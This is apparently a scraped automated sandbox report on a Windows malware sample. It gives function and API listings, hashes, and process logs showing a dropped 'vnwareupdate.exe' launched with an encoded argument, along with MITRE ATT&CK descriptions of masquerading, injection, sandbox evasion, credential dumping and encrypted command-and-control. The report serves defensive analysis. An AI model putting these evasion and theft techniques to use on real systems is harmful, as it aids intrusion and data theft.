sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarUI2FromDisp, xrefs: 02BCC7D9
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarUI2FromDisp$ord%u
API String ID: 590974362-3453968917
Opcode ID: d3601c29df969ef91fb1f697b7910b696b6559d087a86cf7b3b2df64b9a8e551
Instruction ID: d96098606096ae7d443f8dc38be28b8a1c69bf2b95ff6bc3aacf4b6f55d4a006
Opcode Fuzzy Hash: d3601c29df969ef91fb1f697b7910b696b6559d087a86cf7b3b2df64b9a8e551
Instruction Fuzzy Hash: B6E086A6E4431617E301D654BC91AFB77D8AFC1525F584DBEF58341100F766920C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC7CF, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarUI2FromStr, xrefs: 02BCC7CF
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarUI2FromStr$ord%u
API String ID: 590974362-244034265
Opcode ID: 71b9e4c8b819604882195a5daba3631f9ecc4818606479f9edbfef4c0ed66bbc
Instruction ID: 44c787bfa78f09c93135d890c93f59d8f79feab384c5a93d5ed984abbb2192e7
Opcode Fuzzy Hash: 71b9e4c8b819604882195a5daba3631f9ecc4818606479f9edbfef4c0ed66bbc
Instruction Fuzzy Hash: B0E086A6E0435517E205D654BC51AFB77D89F81525F4809BFF58341140E76AD21CC6A3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC739, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarI1FromBool, xrefs: 02BCC739
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarI1FromBool$ord%u
API String ID: 590974362-417341157
Opcode ID: 9360c3db411d6cdf360f497385a3e84c3e10bd731f0248235f75022933c18bbd
Instruction ID: 1f714d9533724e8d5930c801a8d30acc36e43afaa7f8bf4a27a13010be26286b
Opcode Fuzzy Hash: 9360c3db411d6cdf360f497385a3e84c3e10bd731f0248235f75022933c18bbd
Instruction Fuzzy Hash: C2E026A6E0432617E201C654BC81AFB7788AFC1524F480CBEF58240100F366920C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BD20A0, Relevance: 5.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

memcpy.MSVCR90(?,?,?,?,?,?,?,02BC3C6A,?,?,?,?), ref: 02BD20EE
memcpy.MSVCR90(?,?,00000040,?,?,?,?,02BC3C6A,?,?,?,?), ref: 02BD2110
memset.MSVCR90(?,00000000,00000040,?,?,00000001,?,?,00000040,?,?,?,?,02BC3C6A,?), ref: 02BD2137
memcpy.MSVCR90(?,?,?,?,?,?,?,02BC3C6A,?,?,?,?), ref: 02BD216B

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: 3d9cc3376f10b1053cd297c973ad25191fc9f51ff6d1939ff6c51b3baf61627f
Instruction ID: b8a331b37eb8caae5e2baa904cb5157bdbe02fbbd5e0f8cc0e57560b1f3464fe
Opcode Fuzzy Hash: 3d9cc3376f10b1053cd297c973ad25191fc9f51ff6d1939ff6c51b3baf61627f
Instruction Fuzzy Hash: 622102B26007056FD720AE5DDC80AABB7EDEFC0314F01496DFE0693342E6B1EA458A61

Uniqueness

Uniqueness Score: -1.00%

Function 02C60120, Relevance: 5.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

memcpy.MSVCR90(?,02C34C0D,?,?,?,?,?,02C34C0D,00000000), ref: 02C6016E
memcpy.MSVCR90(02C34C0D,02C34C0D,00000040,?,?,?,?,02C34C0D,00000000), ref: 02C60190
memset.MSVCR90 ref: 02C601B7
memcpy.MSVCR90(?,02C34C0D,?,?,?,?,?,02C34C0D,00000000), ref: 02C601EB

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: 893ca2350663a172849bd55410c3523c151df3d19c06278e287b83880bf61b2d
Instruction ID: 61127ab31fac39c7c64e261d5721a883d290ae11343f9c7779df23688b262ead
Opcode Fuzzy Hash: 893ca2350663a172849bd55410c3523c151df3d19c06278e287b83880bf61b2d
Instruction Fuzzy Hash: 6421E0B26007056BD7209E59DCC4B6BB3E9FFC0304F05092DF906A7651E7B1EA458AA6

Uniqueness

Uniqueness Score: -1.00%

Function 02BD06F0, Relevance: 5.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

memcpy.MSVCR90(?,?,?,?,?,?,?,02BC3BAA,?,?,?,?), ref: 02BD073E
memcpy.MSVCR90(?,?,00000040,?,?,?,?,02BC3BAA,?,?,?,?), ref: 02BD0760
memset.MSVCR90(?,00000000,00000040,?,?,00000001,?,?,00000040,?,?,?,?,02BC3BAA,?), ref: 02BD0787
memcpy.MSVCR90(?,?,?,?,?,?,?,02BC3BAA,?,?,?,?), ref: 02BD07BB

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: 4bf5bf819b830c36a6494993b1ef3156925d7dafef5d91e73da7466a2a99dbbd
Instruction ID: b0894d80f66c9fc805583fbb49f9fae84dd8ca2b37875102825329ffb5627044
Opcode Fuzzy Hash: 4bf5bf819b830c36a6494993b1ef3156925d7dafef5d91e73da7466a2a99dbbd
Instruction Fuzzy Hash: 1E21D1B25007056BD320EE59DCC0AABB7EAEF84314F01096DF9895B750E771A9448A65

Uniqueness

Uniqueness Score: -1.00%

Source: unknown	Process created: C:\Users\user\Desktop\GZe6EcSTpO.exe 'C:\Users\user\Desktop\GZe6EcSTpO.exe'
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVDp1EkdsXXU0eMQcUpns8p6kdiZ4rFZD4y5oVgqOEZ9Po4Z4HgwiHmPwR8ajszuHS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU=
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1092'
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1136'
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1244'
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1236'
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1256'
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1300'
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVDp1EkdsXXU0eMQcUpns8p6kdiZ4rFZD4y5oVgqOEZ9Po4Z4HgwiHmPwR8ajszuHS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU=	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1092'	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1136'	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1244'	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1236'	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1256'	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1300'	Jump to behavior

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report GZe6EcSTpO

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Dropped Files

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Exploits:

Privilege Escalation:

Bitcoin Miner:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Code Manipulations

Statistics

Function 0040320C, Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 366
stringcomfileCOMMON

Function 00405768, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 004062A3, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 004037CE, Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402D63, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00402F9C, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Function 004062CA, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 0040273C, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Function 00405B68, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 00405A26, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Function 0040563F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Function 00405720, Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 00406338, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 00405B39, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00405B14, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Function 0040560A, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 00405BE0, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 00405BB1, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 0040159D, Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Function 004031C4, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 004036F4, Relevance: 1.3, APIs: 1, Instructions: 11
COMMON

Function 00404A44, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 481
windowmemoryCOMMONCrypto

Function 00405205, Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Function 004044D1, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274
stringCOMMON

Function 004020D1, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Function 004026FE, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Function 0040677D, Relevance: .3, Instructions: 334
COMMONCrypto

Function 00406F54, Relevance: .3, Instructions: 300
COMMONCrypto

Function 00403B6B, Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 004041AA, Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 202
windowstringCOMMON

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Function 00405C0F, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

